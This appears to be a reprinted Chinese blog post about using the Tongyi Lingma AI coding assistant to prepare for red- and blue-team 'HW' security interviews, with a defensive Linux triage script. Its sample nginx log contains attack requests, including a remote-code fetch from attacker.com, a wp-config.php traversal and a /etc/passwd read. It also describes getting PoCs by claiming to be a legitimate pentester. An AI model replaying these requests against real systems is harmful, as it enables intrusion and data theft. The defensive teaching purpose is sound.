<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    
    <title>巧用通义灵码助力护网面试 | 氕氘氚</title>
    <meta name="keywords" content="hexo,theme,otakism,otaku"/>
    <meta name="HandheldFriendly" content="True"/>
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="google-site-verification" content=""/>
    <meta name="baidu-site-verification" content=""/>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="巧用通义灵码助力护网面试 本文转自 周周的奇妙编程 并作补充  前言 前几年护网还算是一个比较敏感的话题，但是随着近段时间的常态化开始，护网行动也是逐渐走进了大众的视野，成为了社会各界共同关注的安全盛事。本篇也是受通义灵码备战求职季活动的启发，结合近期要开始的护网行动，尝试出一期结合通义灵码助力护网面试的文章，希望帮助更多的朋友拿到offer。  护网行动 护网行动是以公安部牵头的，用以评估企事业">
<meta property="og:type" content="article">
<meta property="og:title" content="巧用通义灵码助力护网面试">
<meta property="og:url" content="https://szczecin.github.io/2025/11/24/AI-HW/index.html">
<meta property="og:site_name" content="氕氘氚">
<meta property="og:description" content="巧用通义灵码助力护网面试 本文转自 周周的奇妙编程 并作补充  前言 前几年护网还算是一个比较敏感的话题，但是随着近段时间的常态化开始，护网行动也是逐渐走进了大众的视野，成为了社会各界共同关注的安全盛事。本篇也是受通义灵码备战求职季活动的启发，结合近期要开始的护网行动，尝试出一期结合通义灵码助力护网面试的文章，希望帮助更多的朋友拿到offer。  护网行动 护网行动是以公安部牵头的，用以评估企事业">
<meta property="og:locale">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/1.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/2.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/3.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/4.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/5.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/6.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/7.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/8.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/9.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/10.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/11.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/12.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/13.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/14.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/15.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/16.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/17.png">
<meta property="og:image" content="https://szczecin.github.io/2025/11/24/AI-HW/18.png">
<meta property="article:published_time" content="2025-11-24T07:17:25.000Z">
<meta property="article:modified_time" content="2025-11-24T07:40:33.880Z">
<meta property="article:author" content="Szczecin">
<meta property="article:tag" content="AI">
<meta property="article:tag" content="Reprint">
<meta property="article:tag" content="HW">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://szczecin.github.io/2025/11/24/AI-HW/1.png">
    

    <!-- Favicon -->
    
        <link rel="icon" href="/img/favicon.ico" />
    

    <!-- Font -->
    <link href="https://fonts.googleapis.com/css?family=Inconsolata|Roboto:300,400,700" rel="stylesheet">

    
<link rel="stylesheet" href="/style.css">

    <script>
      function setLoadingBarProgress(num) {
        document.getElementById('loading-bar').style.width = num + "%";
      }
    </script>

    


<meta name="generator" content="Hexo 6.2.0"></head>

<body>

<div id="loading-bar-wrapper">
  <div id="loading-bar"></div>
</div>

<script>setLoadingBarProgress(20)</script>

<div id="site-wrapper">

    <header id="header">
    <div id="header-wrapper" class="clearfix">
        <a id="logo" href="/">
            <img src="/img/logo.png"/>
            <span id="site-desc">
                Be A Gorgeous World
            </span>
        </a>
        <button id="site-nav-switch">
            <span class="icon icon-menu"></span>
        </button>
    </div>
</header>
    <script>setLoadingBarProgress(40);</script>

    <main id="main" role="main">
        <article id="post-AI-HW"
         class="post article white-box article-type-post"
         itemscope itemprop="blogPost">
    <h2 class="title">
        <a href="/2025/11/24/AI-HW/">
            巧用通义灵码助力护网面试
        </a>
    </h2>
    <time>
        Nov 24, 2025
    </time>
    <section class="content">
        <div class="article-entry" itemprop="articleBody">
            <h1><span id="巧用通义灵码助力护网面试">巧用通义灵码助力护网面试</span></h1><blockquote>
<p>本文转自 <a target="_blank" rel="noopener" href="https://developer.aliyun.com/article/1561672">周周的奇妙编程</a> 并作补充</p>
</blockquote>
<h2><span id="前言">前言</span></h2><blockquote>
<p>前几年护网还算是一个比较敏感的话题，但是随着近段时间的常态化开始，护网行动也是逐渐走进了大众的视野，成为了社会各界共同关注的安全盛事。本篇也是受<strong>通义灵码备战求职季活动</strong>的启发，结合近期要开始的护网行动，尝试出一期结合通义灵码助力护网面试的文章，希望帮助更多的朋友拿到offer。</p>
</blockquote>
<h2><span id="护网行动">护网行动</span></h2><blockquote>
<p>护网行动是以公安部牵头的，用以评估企事业单位的网络安全的活动。</p>
<p>具体实践中，公安部会组织攻防两方，进攻方会在一个月内对防守方发动网络攻击，检测出防守方（企事业单位）存在的安全漏洞。通过与进攻方的对抗，企事业单位网络、系统以及设备等的安全能力会大大提高。</p>
<p>“护网行动”是国家应对网络安全问题所做的重要布局之一。“护网行动”从2016年开始，随着我国对网络安全的重视，涉及单位不断扩大，越来越多的单位都加入到护网行动中，网络安全对抗演练越来越贴近实际情况，各机构对待网络安全需求也从被动构建，升级为业务保障刚需。</p>
<p><img src="/2025/11/24/AI-HW/1.png" alt="image"></p>
<p><strong>红队：</strong>主要负责模拟黑客攻击公司的网络系统，通过发起各种攻击，如漏洞利用、社会工程学攻击、恶意软件攻击、拒绝服务攻击等，来评估公司的网络安全防御能力，并向公司单位提供有关攻击及可能影响的信息。</p>
<p><strong>蓝队：</strong>主要负责响应红队的攻击，保护公司的网络系统安全。蓝队工作主要包括但不限于系统修复、Patch打补丁、网络攻击防御等，维护公司的网络系统安全。此外，蓝队还会通过监控和日志分析，发现并追踪红队的攻击行为，以便加强公司的防御能力。</p>
<p>护网一般按照行政级别分为国家级护网、省级护网、市级护网；除此之外，还有一些行业对于网络安全的要求比较高，因此也会在行业内部展开护网行动，比如教育、医疗、金融等行业。</p>
</blockquote>
<h2><span id="巧用通义灵码助力护网面试">巧用通义灵码助力护网面试</span></h2><blockquote>
<p>根据上文也知道，在护网行动中分为红蓝两队，那么同理，面试时也是按照红蓝分开招聘的，并且根据低、中、高给出不同程度的面试题。</p>
<p>由于涉及到的场景不一样，下面我还是将蓝队和红队分开来讲。</p>
</blockquote>
<h3><span id="蓝队面试">蓝队面试</span></h3><blockquote>
<p>首先我们看一下蓝队面试的基本要求：</p>
<p><strong>初级工程师</strong></p>
<p>1.年龄20周岁及以上，有攻防演练、重保蓝队或者实习工作经验或CTF比赛经历。</p>
<p>2.熟悉常见漏洞原理、挖掘、利用、修复方法，能够进行日志分析、流量分析，准确上报攻击事件。</p>
<p>3.熟悉至少一款主流厂商安全设备，如WAF、威胁感知、主机审计监测工具等。</p>
<p><strong>中级工程师</strong></p>
<p>1.满足初级要求。</p>
<p>2.工作经验1年以上，能力突出可放宽选项。</p>
<p>3.具备全面的安全事件分析处置能力，能够制定有效的应急响应方案，并在第一时间处置突发情况。</p>
<p>4.有多次攻防演练或重保红蓝队工作经验（加分项）。</p>
<p><strong>高级工程师</strong></p>
<p>1.满足中级要求。</p>
<p>2.工作经验2年以上。</p>
<p>3.具备良好的沟通表达能力。</p>
<p>4.可对演练期间出现的各种安全问题提供解决方案，协助客户处理各种突发网络安全事件并输出成果报告。</p>
<p>目前建议最好都是去面<strong>中高蓝</strong>，初级的比较牛马，薪酬也不可观，容易背锅。</p>
</blockquote>
<h4><span id="问答型面试题">问答型面试题</span></h4><blockquote>
<p>问答型面试题对于大模型而言是最为简单的一种，这里需要人工去做的就是整理常见的面试题，建议去微信公众号中看看各位大佬整理的题型，然后结合大模型来学习就可以了，这也并不算是通义灵码独有的能力，所以不过多赘述。</p>
<p><img src="/2025/11/24/AI-HW/2.png" alt="image"></p>
</blockquote>
<h4><span id="案例面试-告警日志分析">案例面试-告警日志分析</span></h4><blockquote>
<p>稍微深层次一点的就是可以借助通义灵码来实现对告警事件的分析和筛选，以研判哪些是误报警，哪些是需要紧急响应的真实威胁。</p>
<p>比如说在WAF上或者IPS上有一堆类似的告警，我们可以通过灵码来进行进一步分析：</p>
<p><img src="/2025/11/24/AI-HW/3.png" alt="image"></p>
<p><img src="/2025/11/24/AI-HW/4.png" alt="image"></p>
<p>在确认攻击细节后，接下来，需要进一步确认该漏洞是否攻击成功，可以进入服务器提取相关日志：</p>
<p>比如说我提取身份验证相关的信息，例如用户登录、注销和失败的登录尝试的日志</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/<span class="keyword">var</span>/log/auth.<span class="property">log</span></span><br></pre></td></tr></table></figure>

<p>将日志文件放入可直接进行分析。</p>
<p><img src="/2025/11/24/AI-HW/5.png" alt="image"></p>
<p>又比如说直接放入nginx日志：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">[06/Jul/2024:13:45:30 +0800] <span class="string">&quot;GET /wp-admin/css/colors/blue/wp-admin.css?ver=5.4.2 HTTP/1.1&quot;</span> 200 10240 <span class="string">&quot;-&quot;</span> <span class="string">&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36&quot;</span></span><br><span class="line">[06/Jul/2024:13:45:31 +0800] <span class="string">&quot;POST /login.php HTTP/1.1&quot;</span> 401 200 <span class="string">&quot;-&quot;</span> <span class="string">&quot;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&quot;</span></span><br><span class="line">[06/Jul/2024:13:46:05 +0800] <span class="string">&quot;GET /cgi-bin/php?%2D%64+%61uto_prepend_file%3Dhttp%3A%2F%2Fattacker.com%2Fmalware.php HTTP/1.1&quot;</span> 404 499 <span class="string">&quot;-&quot;</span> <span class="string">&quot;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)&quot;</span></span><br><span class="line">[06/Jul/2024:13:47:15 +0800] <span class="string">&quot;GET /wp-content/plugins/revslider/temp/update_extract/revslider/update.php?VULNERABLE_PARAMETER=../wp-config.php HTTP/1.1&quot;</span> 200 12345 <span class="string">&quot;-&quot;</span> <span class="string">&quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36&quot;</span></span><br><span class="line">[06/Jul/2024:13:48:05 +0800] <span class="string">&quot;GET /admin/index.php?cmd=cat%20/etc/passwd HTTP/1.1&quot;</span> 403 300 <span class="string">&quot;-&quot;</span> <span class="string">&quot;Python-urllib/2.7&quot;</span></span><br></pre></td></tr></table></figure>

<p><img src="/2025/11/24/AI-HW/6.png" alt="image"></p>
<p>可以协助研判出是否可能存在外部入侵等。</p>
<p>而最后，假设确实存在被入侵的情况，比如说是有上传可疑文件，这时我们同样可以将该可疑文件进行分析：</p>
<p><img src="/2025/11/24/AI-HW/7.png" alt="image"></p>
<p>当然这里仅仅是一个例子，实际情况可能比这个更为复杂。</p>
</blockquote>
<h4><span id="案例面试-脚本撰写">案例面试-脚本撰写</span></h4><blockquote>
<p>对于蓝队中高级，也是需要一定的脚本编写能力的，一般情况下相关机构会提供一些开源脚本，也不一定都需要个人编写，但是就怕脚本本身带后门，一不小心还把客户给污染了，所以一般比较有经验的老师傅还是会选择自己来编写脚本。</p>
<p>像蓝队写的比较多的脚本，一般都是些入侵检测、批量封禁IP或者什么自动化告警上交之类的（娱乐脚本）。</p>
<p>这里就稍微举个例子，比如一台Linux服务器失陷了，一个蓝队小白肯定是会一条条的百度查命令然后顺着执行，但是蓝队的中高老鸟肯定会选择自己编写脚本来直接一键输出。</p>
<p>这里，我们来借助通义灵码直接实现：</p>
<p>给出prompt如下：<strong>我的电脑被入侵了，请帮我直接撰写出shell脚本来一次性排查所有可能涉及的信息项。</strong></p>
<p><img src="/2025/11/24/AI-HW/8.png" alt="image"></p>
<p>初次调教效果也不太如意，没事，我们可以继续优化：<strong>请帮我直接撰写出一个shell脚本输出Linux的机器名、用户信息、登录信息、建立连接的IP、对外监听端口、历史登录信息、安全日志中登录成功信息、历史命令、计划任务。</strong></p>
<p>这里我已经明确的给出了需要输出的内容，通义灵码确实也不含糊，给出了一个完整的脚本：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 输出机器名</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;Machine Name: <span class="subst">$(hostname)</span>&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 输出当前用户信息</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;User Info:&quot;</span></span><br><span class="line"><span class="built_in">id</span> $(<span class="built_in">whoami</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 输出最近的登录信息</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;Last Login Info:&quot;</span></span><br><span class="line">last -w</span><br><span class="line"></span><br><span class="line"><span class="comment"># 显示已建立连接的IP（需根据实际情况调整，这里以netstat为例）</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;Established Connections and IPs:&quot;</span></span><br><span class="line">sudo netstat -ntu | awk <span class="string">&#x27;&#123;print $5&#125;&#x27;</span> | <span class="built_in">cut</span> -d: -f1 | <span class="built_in">sort</span> | <span class="built_in">uniq</span> -c | <span class="built_in">sort</span> -nr</span><br><span class="line"></span><br><span class="line"><span class="comment"># 输出对外监听端口</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;Listening Ports:&quot;</span></span><br><span class="line">sudo netstat -tuln</span><br><span class="line"></span><br><span class="line"><span class="comment"># 历史登录信息（检查/var/log/auth.log或其他相关日志文件，具体路径依系统而异）</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;Historical Login Attempts:&quot;</span></span><br><span class="line">sudo <span class="built_in">cat</span> /var/log/auth.log | grep <span class="string">&#x27;pam_unix\(sshd\:\:session\): session opened for user&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 安全日志中的登录成功信息（同样依赖于具体的日志配置）</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;Successful Logins from Security Log:&quot;</span></span><br><span class="line">sudo <span class="built_in">cat</span> /var/log/auth.log | grep <span class="string">&#x27;Accepted password for&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 用户的历史命令（这里以当前用户为例，使用bash历史记录）</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;User&#x27;s Recent Commands:&quot;</span></span><br><span class="line"><span class="built_in">history</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 计划任务（cron jobs）, 这里只列出当前用户的</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;Scheduled Tasks (Cron Jobs):&quot;</span></span><br><span class="line">crontab -l</span><br><span class="line"></span><br><span class="line"><span class="comment"># 注意：脚本中涉及sudo的部分需要有相应权限才能执行。</span></span><br></pre></td></tr></table></figure>

<p><img src="/2025/11/24/AI-HW/9.png" alt="image"></p>
<p>这里我再稍微修改一下，让脚本输出看上去更美观：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#! /bin/bash</span></span><br><span class="line"><span class="comment"># linux-info v0.1</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;-------------------------机器名-------------------------&quot;</span></span><br><span class="line">hostname</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;-------------------------查看用户信息-------------------------&quot;</span></span><br><span class="line"><span class="built_in">cat</span> /etc/passwd |grep -v nologin |grep -v /bin/false</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;-------------------------查看登录信息-------------------------&quot;</span></span><br><span class="line">w</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;-------------------------查看正在连接的IP-------------------------&quot;</span></span><br><span class="line">netstat -antlp |grep ESTABLISHED</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;-------------------------查看对外监听的端口-------------------------&quot;</span></span><br><span class="line">netstat -antlp |grep LISTEN | grep -v 127.0.0.1</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;-------------------------查看历史登录信息-------------------------&quot;</span></span><br><span class="line">last -F -n 10</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;-------------------------查看安全日志中登录成功信息-------------------------&quot;</span></span><br><span class="line">grep <span class="string">&quot;Accepted &quot;</span> /var/log/secure | awk <span class="string">&#x27;&#123;print $1,$2,$3,$9,$11&#125;&#x27;</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;-------------------------查看历史命令，查找外联-------------------------&quot;</span></span><br><span class="line"><span class="built_in">history</span> | grep -E <span class="string">&quot;([0-9]&#123;1,3&#125;[\.])&#123;3&#125;[0-9]&#123;1,3&#125;&quot;</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;-------------------------查看计划任务-------------------------&quot;</span></span><br><span class="line">crontab -l</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;-------------------------查找隐藏文件-------------------------&quot;</span></span><br><span class="line">find / ! -path <span class="string">&quot;/proc/*&quot;</span> ! -path <span class="string">&quot;/usr/*&quot;</span> ! -path <span class="string">&quot;/var/*&quot;</span> ! -path <span class="string">&quot;/sys/*&quot;</span> -name <span class="string">&quot;.*&quot;</span> -<span class="built_in">print</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;-------------------------其他·提示-------------------------&quot;</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;查看用户进程：lsof -u hack&quot;</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;查看端口占用：lsof -i:8888&quot;</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;查看公钥信息：~/.ssh/id_dsa.pub&quot;</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;查看进程：ps -aux&quot;</span></span><br></pre></td></tr></table></figure>

<p>随便丢进一台测试服务器里跑一下，看看效果：</p>
<p><img src="/2025/11/24/AI-HW/10.png" alt="image"></p>
<p>还行吧，还是有点丑，不过这里也就是测试一下，格式啥的之后再调整吧。</p>
<p>而针对于自动化提交告警脚本可以参照<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/uZC53RqZysfpa7igOlMuig">这个</a>来编写，在通义灵码的帮助下可以更快实现。</p>
</blockquote>
<h4><span id="案例面试-报告撰写">案例面试-报告撰写</span></h4><blockquote>
<p>报告撰写其实也算是大模型的长处了，里面的一些套话都可以用通义灵码来完成，这里也不赘述了，相信大家都会使用。</p>
<p>以上就是蓝队面试的全部内容了，无论是通过直接分析日志、编写自动化脚本，还是辅助撰写专业报告，通义灵码都能够显著提升蓝队工程师在护网行动面试及实际工作中的表现，帮助他们更好地应对网络安全挑战，展现专业能力。</p>
</blockquote>
<h3><span id="红队面试">红队面试</span></h3><blockquote>
<p><strong>红队中高：</strong></p>
<p>1、具备多次国家级、省级护网红队实战经验（获得前三名次优先）</p>
<p>2、熟悉红队打点、内网渗透、域渗透等</p>
<p>3、熟悉社工、免杀对抗等</p>
<p>4、有0day优先（加分项）</p>
<p>5、有SRC前十排名优先（加分项）</p>
<p>6、有CNE、CNVD证书优先（加分项）</p>
<p>红队中级，在红队初级的基础上掌握web原理和语言编程能力，fofa，Haktrails等资产搜索引擎的使用，能高效利用网络上公开的poc批量扫描站点并利用漏洞，具有内网横向渗透以及域控能力。</p>
<p>红队高级，这个时候技术路线就出现了分化。</p>
<p>第一种情况：技术背景是高校科班，研究方向是java和php编码与审计，情报搜集，基于Python的POC加工能力，熟悉常见安全产品的绕过，有src甚至是cvnd的漏洞挖掘经验。</p>
<p>第二种情况：手握大量的扫描器&#x2F;漏洞库&#x2F;服务器资源，强大的资产信息搜索能力，各种最新的批量利用脚本。</p>
<p>两者之间没有高下之分，一个POC管你是自己写的还是别人给的效果都是一样的，如果要说指定站点渗透肯定是第一种技术路线强，但是如果要比实战中哪个杀伤力更大，后者动辄几百台服务器全球扫，即使排除误报和权限维持失败能get的shell一分钟可能比我一年还多。</p>
<p>核心红队，高级红队的基础上在某一领域，如内网，逆向，嵌入式，EDR等方面专精，并能关注0day级别的开源情报威胁，开发岗级别的代码能力以及成熟的自编写插件&#x2F;工具&#x2F;二开经验，就业是各大安全公司中月薪两三万的高级渗透工程师&#x2F;漏洞研究员，大学里的安全实验室负责人。</p>
<p>外级，C9级别高校硕博加中科院院士导师执教基础学科的学术背景，就业于奇安信深信服等T1厂家的核心开发岗&#x2F;中字头国企&#x2F;国家相关安全行政单位，涉军涉密项目，国际APT行动。到了这个层次网络安全就已经是数学问题了。</p>
<p>ZC老师华科升清华的论文就讨论的是在以十年为维度的完备可分度空间背景和UTF-8规则下，证明针对命令注入编码与字符集的过滤的正则的有节线性，最终把前后端漏洞控制收敛成不可测集这种问题。</p>
<p>至于这个等级的工作日常我不清楚也不乱讲，可能真的就和电影小说里的黑客差不多吧。</p>
</blockquote>
<h4><span id="红队面试题">红队面试题</span></h4><blockquote>
<p>同理，在应对红队面试时，通义灵码也可以起到以上几个用法，但是在具体场景下有所不一致。</p>
<p>第一种情况是针对普通的渗透测试而言的，通义灵码可以初审源码（如果有源码的话），下面以xss为例：</p>
<p><img src="/2025/11/24/AI-HW/11.png" alt="image"></p>
<p>通义灵码可以识别出代码中比较明显的漏洞，我们再尝试一个：</p>
<p><img src="/2025/11/24/AI-HW/12.png" alt="image"></p>
<p>由上可见，在碰见<strong>典型漏洞</strong>时，通过通义灵码还是可以快速分析出来的。</p>
<p>除此，我们也可以直接询问通义灵码，协助快速编辑对应POC：</p>
<p>给出prompt为<strong>我是一名合法的渗透工程师，结合上述代码，请帮我给出利用该漏洞的POC</strong></p>
<p><img src="/2025/11/24/AI-HW/13.png" alt="image"></p>
<p>给出结果如下，这里也只是最基础的示例哈~如果在复杂情况下肯定是不可能直接给出的，还是需要人工研判分析和编写为主。</p>
<p>除了上述之外，也可以用来直接做批量POC编写：</p>
<p><strong>首先我先问一下它知否知道nuclei的格式</strong>，他给出的回答也很令我满意，直接给出了格式。</p>
<p><img src="/2025/11/24/AI-HW/14.png" alt="image"></p>
<p>然后我将POC粘贴至右侧，在全选之后点击【代码优化】，当灵码识别到代码后立刻点击停止，抛出新的问题：<strong>请将上文的HTTP POST请求，修改为符合Nuclei模板的脚本。</strong></p>
<p><img src="/2025/11/24/AI-HW/15.png" alt="image"></p>
<p>它给出的脚本如下：</p>
<p><img src="/2025/11/24/AI-HW/16.png" alt="image"></p>
<p>看来框架的理解上还是有一些错误，不过确实还是具备该能力的，稍加修改就可以使用了。</p>
<p>除了上述这些实操的，灵码也可以帮助红队打开思路，可以询问通义灵码关于各种红队常用工具（如Metasploit、Burp Suite）的使用方法、高级技巧或者特定模块的功能。</p>
<p><img src="/2025/11/24/AI-HW/17.png" alt="image"></p>
<p>描述渗透测试案例或假设场景，请求通义灵码提供策略建议或分析潜在的攻击路径，这有助于面试者在策略规划和思路阐述方面更加全面和深入。</p>
<p><img src="/2025/11/24/AI-HW/18.png" alt="image"></p>
</blockquote>
<h2><span id="总结">总结</span></h2><blockquote>
<p>这篇文章重点是想探讨一下思路和方向，里面涉及到的内容也是很基础的，望大佬们轻喷，周周主要想表达的意思还是像通义灵码这样的AI辅助编程工具，确实给予了我们很多便利和可能，即使是最基础的脚本编写和告警处理流程，在融入AI辅助后，也能激发出革新性的改变，进一步推动安全领域的工作效率和智能化水平迈上新台阶。</p>
<p>通义灵码作为AI辅助编程的代表，不仅简化了繁琐的手动编码任务，更关键的是，它通过深度学习和模式识别能力，能够理解和预测代码行为，为开发者提供智能建议，优化代码结构，乃至自动修复潜在的安全漏洞。这意味着安全分析师和运维人员能够从重复劳动中解放出来，将更多精力聚焦于策略制定、风险评估和应急响应等更需智慧判断的任务上。</p>
<p>总结而言，希望通过分享这些基础内容和思路，激发行业内同仁对技术融合创新的思考，鼓励大家积极探索如何将诸如通义灵码之类的AI工具，融入到日常的安全工作中，从而在实战中不断提升安全防护的主动性和精确性，共同推进网络安全防御体系的现代化进程。</p>
<p>这里再额外说几句，其实通义灵码我从去年云栖之后就开始一直使用了，<strong>这一年他的进步其实是肉眼可见的</strong>，从起初辅助基础代码编写、语法纠错这些基本功能，到现在已经能够稍微理解复杂的业务逻辑了。诚然，没有一项技术是完美的，通义灵码仍有提升空间，尤其是在跨领域知识整合与高度创新项目的支持上。但不可否认，它所展现的进步速度和潜力，让我们有理由相信，在不久的将来，它将在软件开发领域扮演更加核心和智能的角色，继续推动行业的边界，助力开发者们实现更大的技术创新和业务价值。</p>
</blockquote>

        </div>
        <div class="article-tags tags">
            
                <a class="tag-none-link" href="/tags/AI/" rel="tag">AI</a><a class="tag-none-link" href="/tags/HW/" rel="tag">HW</a><a class="tag-none-link" href="/tags/Reprint/" rel="tag">Reprint</a>
            
        </div>
    </section>
</article>





        <script>setLoadingBarProgress(60);</script>
    </main>

    <footer id="footer" class="clearfix">

    

    <div class="social-wrapper">
        
            
                <a href="https://github.com/szczecin" class="social github"
                   target="_blank" rel="external">
                    <span class="icon icon-github"></span>
                </a>
            
                <a href="/atom.xml" class="social rss"
                   target="_blank" rel="external">
                    <span class="icon icon-rss"></span>
                </a>
            
        
    </div>

    <div class="theme-by">Theme <span class="codename">Memory</span> designed by <a href="https://artifact.me/"
                                                                                    target="_blank">Art Chen</a>.
    </div>
    <div>&copy; <a href="/">氕氘氚</a></div>

</footer>


    <script>setLoadingBarProgress(80);</script>
    <div class="overlay"></div>
</div>

<div class="site-sidebar" id="site-sidebar">

    

    <div class="sidebar-switch clearfix "
         style="display: none">
        <a class="dark-btn active" data-toggle="toc">
            <span class="icon icon-list"></span>
            <span class="text">Index</span>
        </a>
        <a class="dark-btn" data-toggle="bio">
            <span class="icon icon-person"></span>
            <span class="text">Bio</span>
        </a>
    </div>

    <div class="site-toc "
         style="display: none">
        
            <div class="no-index">No Index</div>
        
    </div>

    <div class="site-bio show"
         style="display: block">

        <div class="about-me clearfix">
            <div class="avatar">
                <img src="/img/avatar.png"/>
            </div>
            <div class="info">
                <a class="name dark-btn" href="/about">
                    Szczecin
                </a>
            </div>
            <div class="info">
                <span class="item desc">
                    Open your eyes to see the light in life
                </span>
            </div>
        </div>

        <div class="menu section">
            <ul class="clearfix">
                
                    <li class="left">
                        <a href="/about"
                           onfocus="this.blur();"
                           class="nav-about dark-btn block">
                            简介
                        </a>
                    </li>
                
                    <li class="right">
                        <a href="/archives"
                           onfocus="this.blur();"
                           class="nav-archives dark-btn block">
                            归档
                        </a>
                    </li>
                
                    <li class="left">
                        <a href="/categories"
                           onfocus="this.blur();"
                           class="nav-categories dark-btn block">
                            分类
                        </a>
                    </li>
                
                    <li class="right">
                        <a href="/tags"
                           onfocus="this.blur();"
                           class="nav-tags dark-btn block">
                            TAGs
                        </a>
                    </li>
                
                    <li class="left">
                        <a href="/WriteUP"
                           onfocus="this.blur();"
                           class="nav-WriteUP dark-btn block">
                            WriteUP
                        </a>
                    </li>
                
                    <li class="right">
                        <a href="/EXP"
                           onfocus="this.blur();"
                           class="nav-EXP dark-btn block">
                            EXP
                        </a>
                    </li>
                
                    <li class="left">
                        <a href="/tags/SRC"
                           onfocus="this.blur();"
                           class="nav-SRC dark-btn block">
                            SRC
                        </a>
                    </li>
                
                    <li class="right">
                        <a href="/Life"
                           onfocus="this.blur();"
